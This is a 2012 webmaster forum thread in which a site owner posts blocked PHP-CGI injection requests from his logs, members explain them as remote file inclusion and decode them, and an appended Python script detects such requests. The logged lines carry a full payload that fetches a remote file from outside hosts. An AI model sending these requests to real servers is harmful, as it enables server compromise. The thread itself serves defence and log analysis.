GET Request

     
7:38 pm on Nov 16, 2012 (gmt 0)

New User

joined:Oct 9, 2012
posts:34
votes: 0


The php got it 403'd

However, I do not have the savvy to understand this request.

<> SPRINT-WIRELESS

68.240.0.0/13 = 68.240.0.0 - 68.247.255.255

68.240.116.xxx - - [16/Nov/2012:06:14:36 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F211.172.112.7%3A8080%2Fecho.txt HTTP/1.1" 403 3251 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

TIA,
Ken

[edited by: incrediBILL at 5:20 am (utc) on Nov 17, 2012]
[edit reason] added line breaks [/edit]

9:22 am on Nov 17, 2012 (gmt 0)

Moderator This Forum from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:8361
votes: 340


This is obviously a hack attempt, trying to inject a script. I wonder if you sent a complaint to SPRINT w/ log snippet whether they'd take any action?

9:40 am on Nov 17, 2012 (gmt 0)

Junior Member

10+ Year Member

joined:Nov 1, 2006
posts: 66
votes: 0


It's a variant of the Remote File Inclusion exploit, attempting to pull in a bad file named 'echo.txt' from port 8080 on a server in Seoul, Korea (211.172.112.n:8080).
The Korean organization is 'Iosystem' (211.172.112.0/23), who live at the unfortunately-named 'Sukchon-Dong, Songpa-gu'. Go figure.

10:17 am on Nov 17, 2012 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:13682
votes: 446


It's a little more intelligible if you decode:

-dsafe_mode=Off
+-ddisable_functions=NULL
+-dallow_url_fopen=On
+-dallow_url_include=On
+-dauto_prepend_file=http://{filename as identified by iamzippy, above}

I suppose Dong in Korean means something utterly boring like Smith or Street. (I asked g###, but the translator played dumb because it wasn't in Korean script.)

:: off to see if URL is duly mentioned in htaccess ::

12:03 pm on Nov 18, 2012 (gmt 0)

New User

joined:Oct 9, 2012
posts:34
votes: 0


Thanks everyone, I've been lurking around for about 3 years now and I have learned a lot from you folks - your expertise has been a great help.

Ken

10:03 pm on Nov 25, 2012 (gmt 0)

New User

joined:Oct 9, 2012
posts:34
votes: 0


Different IP - almost same Request & UA

67.181.147.xxx - - [25/Nov/2012:06:48:27 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F50.22.136.150%3A8080%2Fecho.txt HTTP/1.1" 403 3195 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"
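
A log check for the request pattern discussed in this thread, as an added example that is not part of any post: it decodes the query string the way it was decoded by hand above and flags requests whose `-d` switches override include-related PHP settings, reporting the response status so a hit that was not answered with 403 stands out. The log lines are constructed (documentation-range addresses), and the names `LOG_RE`, `RISKY`, `parse_switches` and `scan` are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Combined log format: client, ident, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')

# PHP ini settings that the requests in this thread try to override
RISKY = {"safe_mode", "disable_functions", "allow_url_fopen",
         "allow_url_include", "auto_prepend_file"}

def parse_switches(query):
    """Return {directive: value} for -d switches in a raw query string."""
    # CGI convention: a query string with no unencoded '=' is handed over as
    # command-line arguments, split on '+'. Normal key=value queries are skipped.
    if "=" in query:
        return {}
    found = {}
    for arg in query.split("+"):
        arg = unquote(arg)  # %3d -> '=', %3A -> ':', %2F -> '/'
        if arg.startswith("-d") and "=" in arg:
            name, value = arg[2:].split("=", 1)
            found[name.strip().lower()] = value
    return found

def scan(lines):
    """Return one record per log line carrying risky -d overrides."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or "?" not in m.group(2):
            continue
        client, target, status = m.groups()
        directives = parse_switches(target.split("?", 1)[1])
        risky = sorted(RISKY.intersection(directives))
        if risky:
            hits.append({"client": client, "status": int(status), "risky": risky,
                         "remote": directives.get("auto_prepend_file", "")})
    return hits

# Constructed sample lines modelled on the requests quoted in the thread
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Nov/2012:06:14:36 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F198.51.100.7%3A8080%2Fecho.txt HTTP/1.1" 403 3251 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [16/Nov/2012:06:15:02 -0800] "GET /index.php?page=2&sort=-date HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [25/Nov/2012:06:48:27 -0800] "GET /index.php?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F198.51.100.9%3A8080%2Fecho.txt HTTP/1.1" 200 3195 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        note = "blocked" if hit["status"] == 403 else "NOT blocked, investigate"
        print(hit["client"], hit["status"], note, hit["risky"], hit["remote"])
```
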
 
